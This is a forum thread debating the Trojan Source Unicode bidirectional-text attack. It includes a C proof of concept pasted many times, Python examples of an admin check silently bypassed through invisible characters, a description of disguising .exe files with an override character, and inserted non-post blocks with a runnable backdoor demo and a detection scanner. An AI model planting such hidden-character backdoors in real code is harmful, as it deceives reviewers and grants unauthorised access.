
Topic: !!! RED ALERT: SHIELDS UP, TROJAN SOURCE HAS ARRIVED !!! (Read 489 times)

newbie
Activity: 58
Merit: 0
seems like fear pronz to me
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always, as does just about everyone I know, do everything locally and then push it up to GitHub or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

I don't code much, but most people I know still code locally. But maybe it's because internet speed/stability isn't good enough to have a good experience with an online code editor.

The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt gets swapped, so the real filename is this-executes-txt.exe.

Windows 7 no longer receives security updates, so those who still use it are vulnerable to more common malware/trojans/ransomware.

P.S. I know there's "Extended Security Updates" for Windows 7, but only corporations with legacy software would pay for it.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt gets swapped, so the real filename is this-executes-txt.exe.

It only works on Windows, as more sane operating systems will classify the file based on its MIME type (by, you know, actually inspecting the file contents)
full member
Activity: 385
Merit: 110
Well, meanwhile, I have read the entire document, looked at examples, looked at what the professor mentions is vulnerable software: basically all web browsers <- that is big.

If this was known then why is it not fixed? Clearly it wasn't known or people didn't take it seriously, I'll let you choose.

Paying 8010 or 1080 is a big deal; this could be fooled on the web.

Anyway I also googled around and found some doc about hacking Unicode; apparently in that doc this was also known.

The thing that alarmed me is that this-executes-exe.txt actually worked in windows 7.

Basically the exe.txt gets swapped, so the real filename is this-executes-txt.exe.

I have never seen such a thing in all these years of Windows usage! That totally shocked me. SO BEWARE!

For now I have calmed down somewhat, totally calm now...

There is babelmap and babeleditor that can be used to experiment with Unicode and control characters! Wink Have fun! =D

I also worry about magnet links for whatever reason... my spider-sense tells me somebody is going to do something bad with it.

Or how about URI payments! AH YES! URI payments would be the perfect way to fool USERS.

HOLYSHIT.

Bye for now,
  Skybuck.
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
Good point. But I doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always, as does just about everyone I know, do everything locally and then push it up to GitHub or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave



Completely agree. I have seen some of these cloud IDEs such as Cloud9 (which is Amazon now I think) and their interface can't offer half the functionality of something like PyCharm, PHPStorm or VSCode, especially with the Git integration.
I might be willing to use a cloud IDE that saves my work-in-progress to the cloud but still has the capability to perform Git functions on the applicable branch of the repo I am working on. This might cut back on commits to my branch if I am pulled away from working on something unexpectedly, for example.

I would not be particularly comfortable with an IDE that saves in real time without the ability to commit my changes. This would make it difficult to undo changes that break something, or that it is later decided not to implement.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
Completely agree. I have seen some of these cloud IDEs such as Cloud9 (which is Amazon now I think) and their interface can't offer half the functionality of something like PyCharm, PHPStorm or VSCode, especially with the Git integration.

Cloud9 is just a mashup of an editor, terminal, and file browser (and another terminal that masquerades as a gdb debugger). There's no extension functionality at all, and I believe you're stuck with whatever linters Cloud9 ships with as well (pylint, eslint, etc.). In most cases there is no semantic/runtime error checking of any kind.

It's completely stupid to host your only local copy in the cloud though; I've lost code from AWS terminating my account while Cloud9 was my only local source. Luckily I had pushed an old copy to a private self-hosted Gitea instance beforehand, after almost rm-ing my entire project folder.
jr. member
Activity: 77
Merit: 7
Good point. But I doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always, as does just about everyone I know, do everything locally and then push it up to GitHub or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave



Completely agree. I have seen some of these cloud IDEs such as Cloud9 (which is Amazon now I think) and their interface can't offer half the functionality of something like PyCharm, PHPStorm or VSCode, especially with the Git integration.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
Good point. But I doubt his test is meaningful since SMF (Simple Machines Forum) is written in PHP while he posted C code.

If you go through all the crap that that account has been posting for the 10 years it's been here, you can see a lot of nonsensical rambling postings, with a bit of paranoia sprinkled in.

That and the total inability to use the code tags.

As I said and others have pointed out, this vulnerability has been known for years. But since some news outlets picked it up, it's now 'important'.

What is also interesting that I have seen in discussions now, is how many people code in the cloud. I always, as does just about everyone I know, do everything locally and then push it up to GitHub or wherever. I never knew how many people are doing it all online and then pull and compile it locally. Guess I'm old.

-Dave

copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7

Something along the below would need to be inserted into the codebase in order for someone to potentially gain administrative access:
Code:
def admin_check(uid, admin_uids):
    '''
    checks if a uid belongs to an administrator

    inputs:
    uid: int username identification number of account being checked
    admin_uids: list, each item in list is the uid of an admin

    returns:
    boolean will be False if uid is not in admin_uids, otherwise function will
    return True
    #an invisible char will cause the docstring to end two lines up
    '''
    for uid_ in admin_uids:
        if uid == uid_:
            return True
    return False
So the actual code the compiler sees is:
Code:
def admin_check(uid, admin_uids):
    '''
    checks if a uid belongs to an administrator

    inputs:
    uid: int username identification number of account being checked
    admin_uids: list, each item in list is the uid of an admin

    returns:
    boolean will be False if uid is not in admin_uids, otherwise function will'''
    return True
    #an invisible char will cause the docstring to end two lines up
    ''''''
    for uid_ in admin_uids:
        if uid == uid_:
            return True
    return False
As you can see, instead of checking the UID against the UIDs in admin_uids, the above function will simply return True when called.

The above should be caught when running unit tests. Even without being caught via unit tests, it should be fairly clear that something is wrong because everyone would have admin access. The bigger risk is if the above was a method in a class that gets inherited by other classes that are used, and are very rarely called. If someone can get a server to call the above method, they could gain administrative access.

When someone installs a library their software depends on, it will download that library and any dependencies to that library to their local computer. So if your server uses some_library_that_depends_on_malicious_libraryA you can trivially check malicious_libraryA (and all other libraries) for invisible characters.
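The docstring-termination trick described in the post above, as an added runnable illustration (this is not the poster's code and not a file from the Trojan Source repository). It uses one real bidirectional control, U+2067 RIGHT-TO-LEFT ISOLATE, written as an escape so it is visible on the page; in a real commit it would be an invisible byte sequence inside the docstring. The function name, the admin list and the UIDs are made up for the example.

```python
import unicodedata

# Constructed example: the early-return variant of Trojan Source applied to
# an admin_check() function.  U+2067 (RIGHT-TO-LEFT ISOLATE) is written as an
# escape here so it is visible; in a real diff it renders as nothing.
RLI = "\u2067"

# What the reviewer's editor or diff renders: the trailing "''' ;return True"
# is pulled into the RTL isolate and reads like the tail of the docstring.
# What the interpreter parses: the docstring ends at the second ''', and
# ";return True" is an unconditional early return.
TROJAN_SOURCE = (
    "def admin_check(uid, admin_uids):\n"
    "    ''' Check whether uid belongs to an administrator " + RLI + "''' ;return True\n"
    "    return uid in admin_uids\n"
)

# The honest version, for comparison.
HONEST_SOURCE = (
    "def admin_check(uid, admin_uids):\n"
    "    ''' Check whether uid belongs to an administrator '''\n"
    "    return uid in admin_uids\n"
)


def load_admin_check(source: str):
    """Compile the given source text and return its admin_check function."""
    namespace = {}
    exec(compile(source, "<admin_check>", "exec"), namespace)
    return namespace["admin_check"]


def invisible_chars(source: str):
    """Return (offset, 'U+XXXX', Unicode name) for every format (Cf) character.

    Bidi overrides, embeddings and isolates are all in category Cf, so this is
    the cheapest possible reviewer-side check."""
    return [
        (i, f"U+{ord(ch):04X}", unicodedata.name(ch, "?"))
        for i, ch in enumerate(source)
        if unicodedata.category(ch) == "Cf"
    ]


def demo():
    """Run both versions against a non-admin UID and collect the evidence."""
    trojan = load_admin_check(TROJAN_SOURCE)
    honest = load_admin_check(HONEST_SOURCE)
    admins = [1, 2, 3]            # constructed admin list
    return {
        "trojan_non_admin": trojan(999, admins),   # True: everyone is an admin
        "honest_non_admin": honest(999, admins),   # False
        "trojan_docstring": trojan.__doc__,        # still reads as benign text
        "invisible": invisible_chars(TROJAN_SOURCE),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Note that the unit-test point made above holds: a test asserting `admin_check(999, [1, 2, 3]) is False` fails immediately against the trojaned version, and the `invisible_chars()` scan flags the single U+2067 without needing to understand the code at all.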
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
Skybuck, you do know there are lucrative bounties by theymos for finding a vuln in forum software (and disclosing it privately), right?
full member
Activity: 385
Merit: 110
Anyways, it's time to test some of this code.

TEST 1 CODE section: OK SAFE

Code:
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TEST 2 QUOTE: OK SAFE

Quote
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TEST 3 JUST WEB COPY:, OK SAFE

#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TELETYPE: OK SAFE

#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SUPERSCRIPT: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SUBSCRIPT: OK SAFE

#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


Table column: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

TABLE: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}
GLOW: OK SAFE

#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


SHADOW: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


STRIKETHROUGH: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


LIST: OK SAFE
  • #include <stdio.h>
    #include <stdbool.h>

    int main() {
        bool isAdmin = false;
        /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
            printf("You are an admin.\n");
        /* end admins only  { ⁦*/
        return 0;
    }

right align: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

centered: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

preformatted text: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}


left align: OK SAFE
#include <stdio.h>
#include <stdbool.h>

int main() {
    bool isAdmin = false;
    /* } ⁦if (isAdmin)⁩ ⁦ begin admins only */
        printf("You are an admin.\n");
    /* end admins only  { ⁦*/
    return 0;
}

THIS FORUM SOFTWARE IS PRETTY GOOD AND SAFE! LOL. Though that right align is a bit whack! HAHA.

FOR NOW THIS FORUM SOFTWARE IS SKYBUCK APPROVED! =D
full member
Activity: 385
Merit: 110
This casts big doubts on the whole UNICODE system you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.
Come on, you know better than to label security bugs as NSA conspiracies like this.

The vulnerabilities are skyrocketing. You also notice it in the news: yet another ransomware attack, or failure of something.

Most ransomware is the result of companies who are running old outdated software with ancient vulnerabilities, not some funky stuff from last year's DEFCON or Black Hat World.


Unfortunately the NSA is not a conspiracy theory; they have hacked about anything they can get their paws on and more! LOL. The most funny one was hacking the POPE. He's not talking to GOD, he's talking to the NSA.

Try to also look towards the future... how all of this can be exploited by scammers!

For bitcoin and other financial systems, swapping financial numbers comes to mind.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
This casts big doubts on the whole UNICODE system you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.
Come on, you know better than to label security bugs as NSA conspiracies like this.

The vulnerabilities are skyrocketing. You also notice it in the news: yet another ransomware attack, or failure of something.

Most ransomware is the result of companies who are running old outdated software with ancient vulnerabilities, not some funky stuff from last year's DEFCON or Black Hat World.
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
Such an attack should be detected easily using the git diff command or GitHub's compare features (on a pull request or between different commits). Besides, even if the pull request/commit is accepted, it'll take time before it's shipped as a new version and there's time to detect such a change.

I've been looking around and for the real tech people it all seems to be a big nothing.
The people who get paid to discuss things and don't understand it seem to be running around screaming "the sky is falling".
Since, as you said, it will show up in any compare check and in anything that does not display Unicode, which many desktop compilers don't, it sounds scarier than it really is.

I would really be more concerned about a real vulnerability like this: https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html

-Dave
legendary
Activity: 2870
Merit: 7490
Crypto Swap Exchange
Such an attack should be detected easily using the git diff command or GitHub's compare features (on a pull request or between different commits). Besides, even if the pull request/commit is accepted, it'll take time before it's shipped as a new version and there's time to detect such a change.
full member
Activity: 385
Merit: 110
My first unicode bug discovery:

It was actually my deep dive into a bitcoin label/text/display bug, a long time ago, that alerted me for the first time to bugs in Unicode implementations (Windows; bitcoin used the old vulnerable API instead of api_ex).

Now that I have dug deeper into the Unicode standard a lot of pus is coming out:

Examples:

"The directional formatting characters are used only to influence the display ordering of text. In all other respects they should be ignored—they have no effect on the comparison of text or on word breaks, parsing, or numeric analysis."

"When working with bidirectional text, the characters are still interpreted in logical order—only the display is affected. The display ordering of bidirectional text depends on the directional properties of the characters in the text. Note that there are important security issues connected with bidirectional text: for more information, see [UTR36]."

^ And then the bomb of bombs:

https://www.unicode.org/reports/tr36/

^Unicode Security Considerations:
(Visual Security Issues, Internationalized Domain Names, Mixed-Script Spoofing, Single-Script Spoofing, Inadequate Rendering Support, Malicious Rendering, Bidirectional Text Spoofing, Glyphs in Complex Scripts, Syntax Spoofing, Missing Glyphs, Numeric Spoofs, IDNA Ambiguity, Punycode Spoofs, UTF-8 Exploits, Ill-Formed Subsequences, Substituting for Ill-Formed Subsequences, Text Comparison (Sorting, Searching, Matching), Buffer Overflows, Deletion of Code Points, Illegal Input Byte Sequences)

Damn, they know about it too! Well, thank you for making all our systems so unsafe!

Whoever thought that something as simple as our alphabet and text was safe, will be very disappointed!
.
.
.
.

So it turns out UNICODE is full of security bugs and considerations. YIKES!

This casts big doubts on the whole UNICODE system; you might as well consider it a GIGANTIC NSA conspiracy to make all of our systems WEAK and HACKABLE.

Even if it's not a conspiracy, the vulnerabilities are sky-rocketing, leading me to write the following text for you all:
.
.
.
.
Stop or slow down digitization.

Unfortunately and with a heavy heart I have to conclude that digitization is going too fast and appears to be too vulnerable.

Also thanks to politicians who pay academics to find vulnerabilities in hardware/equipment and software/codes.

In recent years, bangers of cracks/holes/vulnerabilities have been found in hardware/devices and software/codes.

Most of which have yet to be used by criminals.

We have a lot of trouble ahead of us.

The vulnerabilities are skyrocketing. You also notice it in the news: yet another ransomware attack, or failure of something.

It really can't go on like this.

I advise everyone to ask for a slowdown of, or even a stop to, digitization to give computer programmers and hardware programmers/designers/makers the time to plug the gaps.

Finally, a personal touch: please don't abolish teletext because I think that's fantastic lol, and we might regret the disappearance of the giro collection.

Please keep some non-digital systems standing! Wink And also simpler systems/broadcast systems such as teletext Wink
.
.
.
.
.
For bitcoin I will make an exception; the world may need an alternative currency system vs dollar/euro etc.! Wink

So keep working on BITCOIN! =D

Update: Concerning the digitization:

Here's a simple idea how to do that:

Every information system that is used in the Country will be put on a list.

This list must then be completed/processed/treated by "security specialists".

They then go through systems on that list looking for vulnerabilities.

These must then be resolved.

There may be 1000 systems on that list.

After that, no new system may be added in the Country until that list has been reduced to 1000 or less.

1000 is an example it can also be more or less depending on what is sensible Smiley

Greetings,
  Skybuck.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
I don't get why someone can't just code a small program to strip the UTF-8 format characters out of the file in the first place. Even better if this functionality was integrated in git with a setting to disable it for individual files (e.g. those in RTL languages).
HCP
legendary
Activity: 2086
Merit: 4363
I haven't even read this document fully yet
Maybe come back and let us know what you think after you have actually read the document fully.


Fake vaccines, now we have FAKE SHIELDS and FAKE CODE LOL ! =D
This forum needs a #facepalm emoji... Roll Eyes Roll Eyes Roll Eyes
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
I think the risk of this kind of attack is fairly low. The maintainers of most repos are not going to allow random changes to comments or docstrings.

Yeah, I feel like malicious code changes similar to the proof of concepts in the paper would immediately raise some eyebrows. Not even for fear of invisible characters but because no one wants arbitrary, unhelpful comments sprinkled all over their code. Worse still, if the reviewer is aware of the existence of this kind of attack, the code and commenting style that is required to sneak unwanted logic in will immediately draw attention to itself. You might as well try your luck with an openly visible exploit that is accompanied by a comment that says "// totally not an exploit".

It is a fun attack vector but I don't think it's a very practical one, even ignoring the ease with which such an attempt can be thwarted on the compiler or editor level.
When a pull request is being reviewed, all changes to the code (including comments) are highlighted, and all changes need to be justified. If someone is asking for a comment to be added to a method when no changes are being made to the method, nor has there been any confusion about the method by the userbase, the change will probably be rejected.

If a new function or method is being introduced into a codebase, there might be a bigger risk that the new function or method does not execute as it appears.

Unit testing should also catch these types of attacks. If someone modified code in order to get it to execute in a way that is different than is intended, unit tests for the affected function should fail.
legendary
Activity: 3150
Merit: 2185
Playgram - The Telegram Casino
I think the risk of this kind of attack is fairly low. The maintainers of most repos are not going to allow random changes to comments or docstrings.

Yeah, I feel like malicious code changes similar to the proof of concepts in the paper would immediately raise some eyebrows. Not even for fear of invisible characters but because no one wants arbitrary, unhelpful comments sprinkled all over their code. Worse still, if the reviewer is aware of the existence of this kind of attack, the code and commenting style that is required to sneak unwanted logic in will immediately draw attention to itself. You might as well try your luck with an openly visible exploit that is accompanied by a comment that says "// totally not an exploit".

It is a fun attack vector but I don't think it's a very practical one, even ignoring the ease with which such an attempt can be thwarted on the compiler or editor level.
copper member
Activity: 1666
Merit: 1901
Amazon Prime Member #7
My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !
It looks like a solution has already been found.

I think the risk of this kind of attack is fairly low. The maintainers of most repos are not going to allow random changes to comments or docstrings.

In addition to throwing warnings when invisible chars are used, much of this vulnerability could be eliminated by using "returns" vs "return", standardizing when/where comments are allowed, and disallowing comments and docstrings from containing anything that would execute as code if it were not commented out.
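Several posts in this thread ask for the same tool from different angles: checking a downloaded dependency for invisible characters, a "small program to strip the UTF-8 format characters out of the file", warnings when invisible chars are used, and the Windows filename trick where this-executes-txt.exe is displayed as this-executes-exe.txt. The scanner below is an added example covering all of them; it is not code from the paper, from GitHub, or from any poster. The set of characters it flags, the list of source-file suffixes, and the sample C text and filename are editorial choices made for the example.

```python
import sys
import unicodedata
from pathlib import Path

# Bidirectional controls abused by Trojan Source (embeddings, overrides and
# isolates) plus a few other invisible code points worth flagging in source.
# This table is an assumption made for the example, not an official list.
BIDI_CONTROLS = {
    "\u202a": "LEFT-TO-RIGHT EMBEDDING",
    "\u202b": "RIGHT-TO-LEFT EMBEDDING",
    "\u202c": "POP DIRECTIONAL FORMATTING",
    "\u202d": "LEFT-TO-RIGHT OVERRIDE",
    "\u202e": "RIGHT-TO-LEFT OVERRIDE",
    "\u2066": "LEFT-TO-RIGHT ISOLATE",
    "\u2067": "RIGHT-TO-LEFT ISOLATE",
    "\u2068": "FIRST STRONG ISOLATE",
    "\u2069": "POP DIRECTIONAL ISOLATE",
}
OTHER_INVISIBLES = {"\u200b", "\u200c", "\u200d", "\u200e", "\u200f", "\u2060", "\ufeff"}
SUSPICIOUS = set(BIDI_CONTROLS) | OTHER_INVISIBLES


def find_invisibles(text: str):
    """Return (line, column, 'U+XXXX', name) for each suspicious char in text.

    Line and column are 1-based so a finding can be pasted into an editor."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for col, ch in enumerate(line, start=1):
            if ch in SUSPICIOUS:
                hits.append((lineno, col, f"U+{ord(ch):04X}", unicodedata.name(ch, "?")))
    return hits


def strip_invisibles(text: str) -> str:
    """Drop the suspicious characters (what a git clean filter would do).

    Only appropriate for source files: legitimate RTL string literals in
    Arabic/Hebrew/Persian code would lose their formatting characters."""
    return "".join(ch for ch in text if ch not in SUSPICIOUS)


def true_filename(name: str):
    """Report the logical (real) name and extension behind a displayed filename.

    File managers render names with the bidi algorithm, so
    'this-executes-' + U+202E + 'txt.exe' is displayed as 'this-executes-exe.txt'
    while the file the shell actually launches ends in '.exe'."""
    logical = strip_invisibles(name)
    return {
        "logical": logical,
        "extension": Path(logical).suffix,
        "bidi_override": any(ch in BIDI_CONTROLS for ch in name),
    }


def scan_tree(root: str, suffixes=(".c", ".h", ".py", ".js", ".go", ".rs", ".java")):
    """Walk a checkout or vendored dependency and return {path: hits}."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            try:
                text = path.read_text(encoding="utf-8", errors="strict")
            except (UnicodeDecodeError, OSError):
                continue                      # binary or unreadable: skip
            hits = find_invisibles(text)
            if hits:
                findings[str(path)] = hits
    return findings


# Constructed sample: the commenting-out trick from the C snippet in this
# thread, with the override/isolate characters written as escapes.
SAMPLE_C = (
    "int main() {\n"
    "    bool isAdmin = false;\n"
    "    /*\u202e } \u2066if (isAdmin)\u2069 \u2066 begin admins only */\n"
    '        printf("You are an admin.\\n");\n'
    "    /* end admins only \u202e { \u2066*/\n"
    "    return 0;\n"
    "}\n"
)


if __name__ == "__main__":
    if len(sys.argv) > 1:                     # usage: scanner.py <dir>
        for path, hits in scan_tree(sys.argv[1]).items():
            for lineno, col, cp, name in hits:
                print(f"{path}:{lineno}:{col}: {cp} {name}")
    else:
        for hit in find_invisibles(SAMPLE_C):
            print("sample.c:%d:%d: %s %s" % hit)
        print(true_filename("this-executes-\u202etxt.exe"))
```

Run against a vendored dependency directory it prints one line per finding in the same `file:line:col` shape compilers use, so it drops straight into a pre-commit hook or CI step; a non-empty result for a file in a left-to-right language is enough to reject the change, which is the same decision GitHub's bidirectional-text warning asks the reviewer to make.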
legendary
Activity: 3500
Merit: 6320
Crypto Swap Exchange
This has been known for YEARS and until some non-programmers and clueless media people got hold of it nobody cared.
This is one example I found dated 2017: https://github.com/golang/go/issues/20209
There is at least one more from a bit earlier that I can't find that more or less said the same thing.

Only people who don't program a lot or get paid to scare people think it's a big deal.
Edit: take a look at https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146 (you may have to create an account to see it).
-Dave
full member
Activity: 385
Merit: 110
If it was Star Trek, this would be the point where you're bombarded with so much gunfire that your shields drop to 6% or you have to abandon ship  Wink

But I call bullshit on that paper. Simply running an xterm or other CMD/terminal that only supports ANSI character sets will mitigate this by making the code appear to be the malicious gibberish it really is.



My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

I don't think you've maintained an open source project, but if you have you would know that it is clearly impossible to do this without opening yourself up to more gunfire: unpatched vulnerabilities.

If this was Star Trek hmmm.... then we would believe our shields are ON while they are OFF lol.

Trigger:
if Shield = "OFF" then Shield = "ON"

Anyway... at least you admit there is a big fat problem by switching to CMD.exe; no more project source files for you, no more fancy-pancy development environment for you! LOL.

I wonder how many bugs/hints/warning messages are missed by CMD.EXE! Wink

CMD.EXE on Windows 7 is immune indeed, not sure about PowerShell on Windows 11.

Anyway have fake with your fake shields! LOL.

Fake vaccines, now we have FAKE SHIELDS and FAKE CODE LOL ! =D

Anyway on a more serious note, GITHUB has taken some precautions which can be seen here:

https://github.com/nickboucher/trojan-source/blob/main/C/commenting-out.c

and here:

https://github.blog/changelog/2021-10-31-warning-about-bidirectional-unicode-text/

So not all is bad.

Github was recently purchased by Microsoft, makes me wonder... are they trying to cover up something ?
jr. member
Activity: 77
Merit: 7
Also, this is not so different from supply chain attacks if this was committed to a library. As a cybersecurity analyst, we vet any software and new updates in a sandbox before releasing them to production. We also have other security tools in place to stop malicious behaviour or alert us if any malicious behaviour is found.

Also agree on the command line with NotATether; most only support ANSI.

I could see in some cases how this can be a problem, but papers like this are only useful to bring information like this to the masses and people in cybersecurity as something to look out for. I doubt there are many of these attacks being exploited in the wild.
legendary
Activity: 1568
Merit: 6660
bitcoincleanup.com / bitmixlist.org
If it was Star Trek, this would be the point where you're bombarded with so much gunfire that your shields drop to 6% or you have to abandon ship  Wink

But I call bullshit on that paper. Simply running an xterm or other CMD/terminal that only supports ANSI character sets will mitigate this by making the code appear to be the malicious gibberish it really is.



My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

I don't think you've maintained an open source project, but if you have you would know that it is clearly impossible to do this without opening yourself up to more gunfire: unpatched vulnerabilities.
full member
Activity: 385
Merit: 110
I haven't even read this document fully yet, but all signs point to MAJOR TROUBLE AHEAD for open source projects:

https://www.trojansource.codes/trojan-source.pdf

My recommendation is to hold all patches/pull requests until solutions/defense/shields are found !

Bye for now,
  Skybuck.